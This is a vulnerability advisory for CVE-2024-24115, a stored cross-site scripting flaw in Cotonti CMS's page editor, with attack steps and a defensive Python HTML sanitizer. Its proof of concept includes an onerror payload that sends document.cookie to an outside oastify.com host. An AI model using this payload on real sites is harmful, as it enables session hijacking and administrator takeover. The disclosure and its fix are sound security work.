Mechaneus Security Research and Bug Hunting


CVE-2024-24115: Stored Cross-Site Scripting (XSS) in Edit Page function in Cotonti CMS 0.9.24

https://github.com/Cotonti/Cotonti

Vulnerability Type

CWE-79: Cross-site Scripting (XSS) - Stored

CVSS 7.6 HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L

Description

A user in the moderator group, or in any other group that can edit Pages, is able to inject malicious JavaScript code into a Page and effectively steal the session cookie of any user who views it, including any administrator's.

Execution steps

  1. A Member User is logged in and can edit a Page (example: the Welcome! page in the News category).
  2. The Member User adds malicious code to the Page while its ‘parser’ is set to ‘none’.
  3. The Member User views the Page: the malicious code is stored but not executed.
  4. The Member User edits the Page and switches ‘parser’ to ‘html’.
  5. An Admin user logs in and views the Page; the malicious code is silently executed.
  6. The Attacker receives the cookie of the Admin who visited the Page.
  7. The stolen cookie belongs to an administrator, so the Attacker has full access to the CMS.
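The root cause above is that the save which flips ‘parser’ from ‘none’ to ‘html’ persists whatever the editor typed as raw markup. As an added defender-side illustration (not Cotonti's own code), the following server-side gate runs every page save through an allowlist sanitizer unless the editor belongs to a group trusted with raw HTML, so script tags, on* handlers and javascript: URLs never reach the stored Page. The group name, tag allowlist and URL policy are assumptions, and a production deployment should use a maintained sanitizer library rather than this minimal one.

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
SAFE_URL_PREFIXES = ("http://", "https://", "/")
RAW_HTML_GROUPS = {"Administrators"}  # assumed: groups trusted with unsanitized HTML


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0  # skip > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
        if tag not in ALLOWED_TAGS or self.skip:
            return  # unknown tags are dropped, their text content is kept
        kept = ""
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # drops onerror=, onclick=, style=, ...
            value = (value or "").strip()
            if name in ("href", "src") and not value.lower().startswith(SAFE_URL_PREFIXES):
                continue  # drops javascript:, data: and bare junk such as src=x
            kept += f' {name}="{escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and tag not in ("br", "img") and not self.skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))  # text is always re-escaped


def sanitize_html(markup: str) -> str:
    p = AllowlistSanitizer()
    p.feed(markup)
    p.close()
    return "".join(p.out)


def content_to_store(markup: str, parser_mode: str, user_groups) -> str:
    """Gate run on every save, including the save that flips 'parser' to 'html'."""
    if parser_mode == "html" and not RAW_HTML_GROUPS & set(user_groups):
        return sanitize_html(markup)
    return markup
```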

Impact

A malicious user in the moderator group, or in any other group that can edit Pages, can escalate their privileges to any higher-level group, including Administrators, without being authorized. The malicious user can then create, edit and delete any content in the CMS, create new users with any privilege, and disable users.

Proof of Concept code

Add some random text in HTML <p> tags and then either:

  1. Pop up the cookie with an alert:
    <script>alert(document.cookie)</script>

    OR

  2. Send the cookie to an Attacker-controlled server:
    <img src=x onerror=this.src="http://5ekinbe9n3ta9w10ozijz91ex53wrmfb.oastify.com?c="+document.cookie />

References